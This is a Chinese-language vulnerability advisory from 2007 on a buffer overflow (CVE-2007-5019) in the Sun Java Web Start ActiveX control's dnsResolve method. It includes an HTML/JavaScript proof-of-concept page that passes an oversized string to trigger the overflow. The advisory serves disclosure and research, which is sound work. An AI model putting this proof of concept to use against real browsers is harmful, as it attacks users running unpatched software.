发布日期：2007-09-19
更新日期：2007-09-20

受影响系统：

Sun JRE 1.6_10
Sun JRE 1.6
Sun Java Web Start

描述：

---

BUGTRAQ  ID: 25734
CVE(CAN) ID: CVE-2007-5019

Sun Java Web Start是最新版JRE及Java应用部署技术。

Java Runtime Environment (JRE) 1.6.0_X内的Sun Java Web Start控件存在缓冲区溢出漏洞，可使远程攻击者通过向dnsResolve (isInstalled.dnsResolve)方法传递较长的参数执行安全攻击。

<*来源：YAG KOHHA （skyhole@gmail.com）
  
  链接：http://xforce.iss.net/xforce/xfdb/36682
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

YAG KOHHA （skyhole@gmail.com）提供了如下测试方法：

<html>
<body>
<center>
Sun (jre1.6.0_X) isInstalled.dnsResolve function overflow PoC<br>
Bug founded and code released by Yag Kohha. <br>
Greetz to: <br>
Shinnai, Str0ke <br>

</center>
<object classid="CLSID:5852F5ED-8BF4-11D4-A245-0080C6F74284"
id="target"></OBJECT>
<SCRIPT language="javascript">
var b = 'XXXX';
while (b.length <= 512*512) b+=b;
target.dnsResolve(b);
</script>
</body>
</html>

建议：

---

厂商补丁：

Sun
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://sunsolve.sun.com/security

浏览次数：2720
严重程度：0（网友投票）